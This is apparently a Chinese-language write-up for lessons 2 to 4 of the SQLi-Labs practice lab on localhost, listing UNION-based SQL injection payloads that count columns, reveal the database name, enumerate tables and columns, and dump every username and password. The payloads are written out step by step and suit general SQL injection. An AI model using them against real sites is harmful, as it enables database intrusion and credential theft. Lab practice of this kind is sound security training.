Less2-Less4和Less1的查詢語句類似,只是引號及括號的區(qū)別。
Less2
基于錯(cuò)誤_GET_數(shù)字型注入
http://localhost:8088/sqlilabs/Less-2/?id=1
http://localhost:8088/sqlilabs/Less-2/?id=1'
http://localhost:8088/sqlilabs/Less-2/?id=1"

第一條正常,第二、第三條報(bào)錯(cuò):數(shù)字型注入
查詢語句:
select username,password from table_name where id=$_GET['id'] limit 0,1
http://localhost:8088/sqlilabs/Less-2/?id=1 order by 4--+
3個(gè)字段
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,3--+
第2、第3字段
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,concat_ws('-',user(),database())--+
數(shù)據(jù)庫:security
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
表名:users
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
字段名:id、username、password
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+
END.
Less3
基于錯(cuò)誤_GET_單引號_小括號_字符型注入
http://localhost:8088/sqlilabs/Less-3/?id=1
http://localhost:8088/sqlilabs/Less-3/?id=1'
http://localhost:8088/sqlilabs/Less-3/?id=1"

第一、第三條正常,第二條報(bào)錯(cuò):字符型注入
查詢語句:
select username,password from table_name where id=('$_GET['id']') limit 0,1
http://localhost:8088/sqlilabs/Less-3/?id=1') order by 4--+
3個(gè)字段
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,3--+
第2、第3字段
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,concat_ws('-',user(),database())--+
數(shù)據(jù)庫:security
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
表名:users
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
字段名:id、username、password
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+
END.
Less4
基于錯(cuò)誤_GET_雙引號_小括號_字符型注入
http://localhost:8088/sqlilabs/Less-4/?id=1
http://localhost:8088/sqlilabs/Less-4/?id=1'
http://localhost:8088/sqlilabs/Less-4/?id=1"

第一、第二條正常,第三條報(bào)錯(cuò):字符型注入
查詢語句:
select username,password from table_name where id=("$_GET['id']") limit 0,1
http://localhost:8088/sqlilabs/Less-4/?id=1") order by 4--+
3個(gè)字段
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,3--+
第2、第3字段
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,concat_ws('-',user(),database())--+
數(shù)據(jù)庫:security
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
表名:users
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
字段名:id、username、password
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
END.